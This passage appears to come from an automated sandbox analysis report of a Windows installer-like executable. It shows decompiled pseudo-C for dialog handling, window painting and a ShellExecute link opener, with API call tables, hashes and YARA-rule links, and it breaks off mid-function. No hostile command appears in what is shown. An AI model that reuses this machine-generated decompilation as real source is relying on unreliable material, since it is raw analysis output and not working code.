										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423ea0,  *_t130 +  *0x423680 & 0x0000ffff, _t125,  *(0x4091c8 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423678 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403F18(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423678, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42366c - _t133;
									if( *0x42366c != _t133) {
										goto L61;
									}
									ShowWindow( *0x423678, 8);
									E00403F64(0x405);
									goto L58;
								}
								__eflags =  *0x423f2c - _t133;
								if( *0x423f2c != _t133) {
									goto L61;
								}
								__eflags =  *0x423f20 - _t133;
								if( *0x423f20 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423678);
						 *0x423ea8 = _t133;
						EndDialog(_t125,  *0x41f868);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423678, 0x40f, 0, 1);
						__eflags =  *0x42366c;
						return 0 |  *0x42366c == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420478, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420478,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403F7F(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423678, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423f2c - _t133;
										if( *0x423f2c == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f868 = 1;
											L21:
											_push(0x78);
											L22:
											E00403EF1();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f868 = _t127;
										goto L21;
									}
									__eflags =  *0x4091c4 - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423678);
						 *0x423678 = _a12;
						L58:
						if( *0x4214a0 == _t133 &&  *0x423678 != _t133) {
							ShowWindow(_t125, 0xa);
							 *0x4214a0 = 1;
						}
						L61:
						return 0;
					}
				}
			}






























                                                                                                        0x00403a4e
                                                                                                        0x00403a57
                                                                                                        0x00403b98
                                                                                                        0x00403b9c
                                                                                                        0x00403ba0
                                                                                                        0x00403ba2
                                                                                                        0x00403ba7
                                                                                                        0x00403bb2
                                                                                                        0x00403bbd
                                                                                                        0x00403bc2
                                                                                                        0x00403bc4
                                                                                                        0x00403bc6
                                                                                                        0x00403bc9
                                                                                                        0x00403bce
                                                                                                        0x00403bdc
                                                                                                        0x00403be9
                                                                                                        0x00403bf0
                                                                                                        0x00403bf0
                                                                                                        0x00403bf1
                                                                                                        0x00403bf1
                                                                                                        0x00403bf6
                                                                                                        0x00403bfc
                                                                                                        0x00403c03
                                                                                                        0x00403c09
                                                                                                        0x00403c0b
                                                                                                        0x00403c4b
                                                                                                        0x00403c50
                                                                                                        0x00403c55
                                                                                                        0x00403c55
                                                                                                        0x00403c5a
                                                                                                        0x00403c63
                                                                                                        0x00403c65
                                                                                                        0x00403c6a
                                                                                                        0x00403c70
                                                                                                        0x00403c74
                                                                                                        0x00403c74
                                                                                                        0x00403c79
                                                                                                        0x00403c7f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403c8a
                                                                                                        0x00403c90
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403c99
                                                                                                        0x00403ca1
                                                                                                        0x00403ca6
                                                                                                        0x00403ca9
                                                                                                        0x00403caf
                                                                                                        0x00403cb4
                                                                                                        0x00403cb7
                                                                                                        0x00403cbd
                                                                                                        0x00403cc2
                                                                                                        0x00403cc5
                                                                                                        0x00403ccb
                                                                                                        0x00403cd3
                                                                                                        0x00403cd9
                                                                                                        0x00403cdf
                                                                                                        0x00403ce3
                                                                                                        0x00403cea
                                                                                                        0x00403cea
                                                                                                        0x00403cea
                                                                                                        0x00403cf4
                                                                                                        0x00403d06
                                                                                                        0x00403d12
                                                                                                        0x00403d17
                                                                                                        0x00403d21
                                                                                                        0x00403d27
                                                                                                        0x00403d29
                                                                                                        0x00403d2e
                                                                                                        0x00403d2b
                                                                                                        0x00403d2b
                                                                                                        0x00403d2b
                                                                                                        0x00403d3e
                                                                                                        0x00403d56
                                                                                                        0x00403d58
                                                                                                        0x00403d5e
                                                                                                        0x00403d73
                                                                                                        0x00403d60
                                                                                                        0x00403d69
                                                                                                        0x00403d6b
                                                                                                        0x00403d6b
                                                                                                        0x00403d79
                                                                                                        0x00403d89
                                                                                                        0x00403d9a
                                                                                                        0x00403da1
                                                                                                        0x00403da7
                                                                                                        0x00403dab
                                                                                                        0x00403db0
                                                                                                        0x00403db2
                                                                                                        0x00000000
                                                                                                        0x00403db8
                                                                                                        0x00403db8
                                                                                                        0x00403dba
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403dc0
                                                                                                        0x00403dc4
                                                                                                        0x00403de9
                                                                                                        0x00403def
                                                                                                        0x00403df5
                                                                                                        0x00403df7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403e1d
                                                                                                        0x00403e23
                                                                                                        0x00403e25
                                                                                                        0x00403e2a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403e30
                                                                                                        0x00403e33
                                                                                                        0x00403e36
                                                                                                        0x00403e4d
                                                                                                        0x00403e59
                                                                                                        0x00403e72
                                                                                                        0x00403e78
                                                                                                        0x00403e7c
                                                                                                        0x00403e81
                                                                                                        0x00403e87
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403e91
                                                                                                        0x00403e9c
                                                                                                        0x00000000
                                                                                                        0x00403e9c
                                                                                                        0x00403dc6
                                                                                                        0x00403dcc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403dd2
                                                                                                        0x00403dd8
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403dde
                                                                                                        0x00403db2
                                                                                                        0x00403ea9
                                                                                                        0x00403eb5
                                                                                                        0x00403ebc
                                                                                                        0x00000000
                                                                                                        0x00403c0d
                                                                                                        0x00403c0d
                                                                                                        0x00403c10
                                                                                                        0x00403c43
                                                                                                        0x00403c43
                                                                                                        0x00403c45
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403c45
                                                                                                        0x00403c12
                                                                                                        0x00403c16
                                                                                                        0x00403c1b
                                                                                                        0x00403c1d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403c2d
                                                                                                        0x00403c35
                                                                                                        0x00000000
                                                                                                        0x00403c3b
                                                                                                        0x00403a69
                                                                                                        0x00403a69
                                                                                                        0x00403a6d
                                                                                                        0x00403a72
                                                                                                        0x00403a81
                                                                                                        0x00403a81
                                                                                                        0x00403a8a
                                                                                                        0x00403a93
                                                                                                        0x00403a9e
                                                                                                        0x00403a9e
                                                                                                        0x00403aaa
                                                                                                        0x00403ac6
                                                                                                        0x00403ac9
                                                                                                        0x00403adc
                                                                                                        0x00403ae2
                                                                                                        0x00403b85
                                                                                                        0x00000000
                                                                                                        0x00403b8e
                                                                                                        0x00403ae8
                                                                                                        0x00403af5
                                                                                                        0x00403af7
                                                                                                        0x00403af9
                                                                                                        0x00403b18
                                                                                                        0x00403b18
                                                                                                        0x00403b1b
                                                                                                        0x00403b20
                                                                                                        0x00403b23
                                                                                                        0x00403b33
                                                                                                        0x00403b34
                                                                                                        0x00403b36
                                                                                                        0x00403b6c
                                                                                                        0x00403b7f
                                                                                                        0x00000000
                                                                                                        0x00403b7f
                                                                                                        0x00403b38
                                                                                                        0x00403b3e
                                                                                                        0x00403b57
                                                                                                        0x00403b5c
                                                                                                        0x00403b5e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403b60
                                                                                                        0x00403b4c
                                                                                                        0x00403b4c
                                                                                                        0x00403b4e
                                                                                                        0x00403b4e
                                                                                                        0x00000000
                                                                                                        0x00403b4e
                                                                                                        0x00403b41
                                                                                                        0x00403b46
                                                                                                        0x00000000
                                                                                                        0x00403b46
                                                                                                        0x00403b25
                                                                                                        0x00403b2b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403b2d
                                                                                                        0x00000000
                                                                                                        0x00403b2d
                                                                                                        0x00403b1d
                                                                                                        0x00000000
                                                                                                        0x00403b1d
                                                                                                        0x00403b03
                                                                                                        0x00403b0a
                                                                                                        0x00403b10
                                                                                                        0x00403b12
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403b12
                                                                                                        0x00403ace
                                                                                                        0x00000000
                                                                                                        0x00403aac
                                                                                                        0x00403ab2
                                                                                                        0x00403abc
                                                                                                        0x00403ec2
                                                                                                        0x00403ec8
                                                                                                        0x00403ed5
                                                                                                        0x00403edb
                                                                                                        0x00403edb
                                                                                                        0x00403ee5
                                                                                                        0x00000000
                                                                                                        0x00403ee5
                                                                                                        0x00403aaa

                                                                                                        APIs
                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A81
                                                                                                        • ShowWindow.USER32(?), ref: 00403A9E
                                                                                                        • DestroyWindow.USER32 ref: 00403AB2
                                                                                                        • SetWindowLongA.USER32 ref: 00403ACE
                                                                                                        • GetDlgItem.USER32 ref: 00403AEF
                                                                                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403B03
                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 00403B0A
                                                                                                        • GetDlgItem.USER32 ref: 00403BB8
                                                                                                        • GetDlgItem.USER32 ref: 00403BC2
                                                                                                        • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403BDC
                                                                                                        • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C2D
                                                                                                        • GetDlgItem.USER32 ref: 00403CD3
                                                                                                        • ShowWindow.USER32(00000000,?), ref: 00403CF4
                                                                                                        • EnableWindow.USER32(?,?), ref: 00403D06
                                                                                                        • EnableWindow.USER32(?,?), ref: 00403D21
                                                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D37
                                                                                                        • EnableMenuItem.USER32 ref: 00403D3E
                                                                                                        • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D56
                                                                                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D69
                                                                                                        • lstrlenA.KERNEL32(004204A0,?,004204A0,004236A0), ref: 00403D92
                                                                                                        • SetWindowTextA.USER32(?,004204A0), ref: 00403DA1
                                                                                                        • ShowWindow.USER32(?,0000000A), ref: 00403ED5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 184305955-0
                                                                                                        • Opcode ID: 14e7e0a8131732f9e150b36a7fce0cb21c204cb0cec2561e24870ec1d01c69b9
                                                                                                        • Instruction ID: 1b558320748e03173a152966608fa9e4bba3452d5179f8dde3fdb5243a6fbb8a
                                                                                                        • Opcode Fuzzy Hash: 14e7e0a8131732f9e150b36a7fce0cb21c204cb0cec2561e24870ec1d01c69b9
                                                                                                        • Instruction Fuzzy Hash: 21C18071A04204BBDB216F21ED45E2B3E7DEB4970AF40053EF541B12E1C739AA42DB6E
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00404060, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 93%
                                                                                                        			E00404060(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420480 =  *0x420480 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403F7F(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422e40;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422e40
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423ea8, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423ea8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420480 != 0) {
						goto L25;
					} else {
						_t112 =  *0x41fc70 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403F3A(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004042EB();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x42367c - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x423ed8;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E0040402C;
				E00403F18(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403F18(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403F3A( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403F4D(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x423eb0 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f464 =  *0x41f464 & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420480 =  *0x420480 & 0x00000000;
				return 0;
			}

















                                                                                                        0x00404070
                                                                                                        0x00404196
                                                                                                        0x004041f2
                                                                                                        0x004041f6
                                                                                                        0x004042cd
                                                                                                        0x004042cf
                                                                                                        0x004042cf
                                                                                                        0x004042d5
                                                                                                        0x004042d5
                                                                                                        0x004042d8
                                                                                                        0x00000000
                                                                                                        0x004042df
                                                                                                        0x00404204
                                                                                                        0x00404206
                                                                                                        0x00404210
                                                                                                        0x0040421b
                                                                                                        0x0040421e
                                                                                                        0x00404221
                                                                                                        0x0040422c
                                                                                                        0x0040422f
                                                                                                        0x00404236
                                                                                                        0x00404244
                                                                                                        0x0040425c
                                                                                                        0x00404264
                                                                                                        0x0040426f
                                                                                                        0x0040427f
                                                                                                        0x00404281
                                                                                                        0x00404281
                                                                                                        0x00404236
                                                                                                        0x0040428b
                                                                                                        0x00000000
                                                                                                        0x00404296
                                                                                                        0x0040429a
                                                                                                        0x004042ab
                                                                                                        0x004042ab
                                                                                                        0x004042b1
                                                                                                        0x004042bf
                                                                                                        0x004042bf
                                                                                                        0x00000000
                                                                                                        0x004042c3
                                                                                                        0x0040428b
                                                                                                        0x004041a1
                                                                                                        0x00000000
                                                                                                        0x004041b5
                                                                                                        0x004041bb
                                                                                                        0x004041c1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004041e6
                                                                                                        0x004041e8
                                                                                                        0x004041ed
                                                                                                        0x00000000
                                                                                                        0x004041ed
                                                                                                        0x004041a1
                                                                                                        0x00404076
                                                                                                        0x00404079
                                                                                                        0x0040407e
                                                                                                        0x0040408f
                                                                                                        0x0040408f
                                                                                                        0x00404096
                                                                                                        0x00404099
                                                                                                        0x0040409b
                                                                                                        0x004040a0
                                                                                                        0x004040a9
                                                                                                        0x004040af
                                                                                                        0x004040bb
                                                                                                        0x004040be
                                                                                                        0x004040c7
                                                                                                        0x004040cc
                                                                                                        0x004040cf
                                                                                                        0x004040d4
                                                                                                        0x004040eb
                                                                                                        0x004040f2
                                                                                                        0x00404105
                                                                                                        0x00404108
                                                                                                        0x0040411d
                                                                                                        0x00404124
                                                                                                        0x00404129
                                                                                                        0x0040412e
                                                                                                        0x0040412e
                                                                                                        0x0040413d
                                                                                                        0x0040414c
                                                                                                        0x0040414e
                                                                                                        0x00404164
                                                                                                        0x00404173
                                                                                                        0x00404175
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • CheckDlgButton.USER32 ref: 004040EB
                                                                                                        • GetDlgItem.USER32 ref: 004040FF
                                                                                                        • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040411D
                                                                                                        • GetSysColor.USER32(?), ref: 0040412E
                                                                                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040413D
                                                                                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040414C
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00404156
                                                                                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404164
                                                                                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404173
                                                                                                        • GetDlgItem.USER32 ref: 004041D6
                                                                                                        • SendMessageA.USER32(00000000), ref: 004041D9
                                                                                                        • GetDlgItem.USER32 ref: 00404204
                                                                                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404244
                                                                                                        • LoadCursorA.USER32 ref: 00404253
                                                                                                        • SetCursor.USER32(00000000), ref: 0040425C
                                                                                                        • ShellExecuteA.SHELL32(0000070B,open,@.B,00000000,00000000,00000001), ref: 0040426F
                                                                                                        • LoadCursorA.USER32 ref: 0040427C
                                                                                                        • SetCursor.USER32(00000000), ref: 0040427F
                                                                                                        • SendMessageA.USER32(00000111,00000001,00000000), ref: 004042AB
                                                                                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 004042BF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                        • String ID: @.B$N$open
                                                                                                        • API String ID: 3615053054-3815657624
                                                                                                        • Opcode ID: e8b988e3949f0b6d91b1b58256fef292242953983a672fd1ea6cb44b2e1e2ed0
                                                                                                        • Instruction ID: 7761d7a6ce13443680711406d70bf9c6d022160e69bfd2fffc9b265f6460a43d
                                                                                                        • Opcode Fuzzy Hash: e8b988e3949f0b6d91b1b58256fef292242953983a672fd1ea6cb44b2e1e2ed0
                                                                                                        • Instruction Fuzzy Hash: 4661B2B1A40209BFEB109F60DC45F6A3B69FB44755F10817AFB04BA2D1C7B8A951CF98
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 90%
                                                                                                        			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423eb0;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x4236a0, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x423ea8;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                                                                                        0x0040100a
                                                                                                        0x00401039
                                                                                                        0x00401047
                                                                                                        0x0040104d
                                                                                                        0x00401051
                                                                                                        0x0040105b
                                                                                                        0x00401061
                                                                                                        0x00401064
                                                                                                        0x004010f3
                                                                                                        0x00401089
                                                                                                        0x0040108c
                                                                                                        0x004010a6
                                                                                                        0x004010bd
                                                                                                        0x004010cc
                                                                                                        0x004010cf
                                                                                                        0x004010d5
                                                                                                        0x004010d9
                                                                                                        0x004010e4
                                                                                                        0x004010ed
                                                                                                        0x004010ef
                                                                                                        0x004010ef
                                                                                                        0x00401100
                                                                                                        0x00401105
                                                                                                        0x0040110d
                                                                                                        0x00401110
                                                                                                        0x00401112
                                                                                                        0x00401118
                                                                                                        0x0040111f
                                                                                                        0x00401126
                                                                                                        0x00401130
                                                                                                        0x00401142
                                                                                                        0x00401156
                                                                                                        0x00401160
                                                                                                        0x00401165
                                                                                                        0x00401165
                                                                                                        0x00401110
                                                                                                        0x0040116e
                                                                                                        0x00000000
                                                                                                        0x00401178
                                                                                                        0x00401010
                                                                                                        0x00401013
                                                                                                        0x00401015
                                                                                                        0x0040101f
                                                                                                        0x0040101f
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                        • GetClientRect.USER32 ref: 0040105B
                                                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                        • FillRect.USER32 ref: 004010E4
                                                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                        • DrawTextA.USER32(00000000,004236A0,000000FF,00000010,00000820), ref: 00401156
                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                        • String ID: F
                                                                                                        • API String ID: 941294808-1304234792
                                                                                                        • Opcode ID: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                                                                                                        • Instruction ID: 81477e3a2fde3fb3f26aa953fc06e347994717d76cab2c79682594c458f31f57
                                                                                                        • Opcode Fuzzy Hash: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                                                                                                        • Instruction Fuzzy Hash: 8141BC71804249AFCB058FA4CD459BFBFB9FF44314F00802AF551AA1A0C378EA54DFA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004058B4, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144filememoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 93%
                                                                                                        			E004058B4() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405E88(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423f30 =  *0x423f30 + 1;
						return _t20;
					}
				}
				 *0x422630 = 0x4c554e;
				if(_t49 == 0) {
					L5:
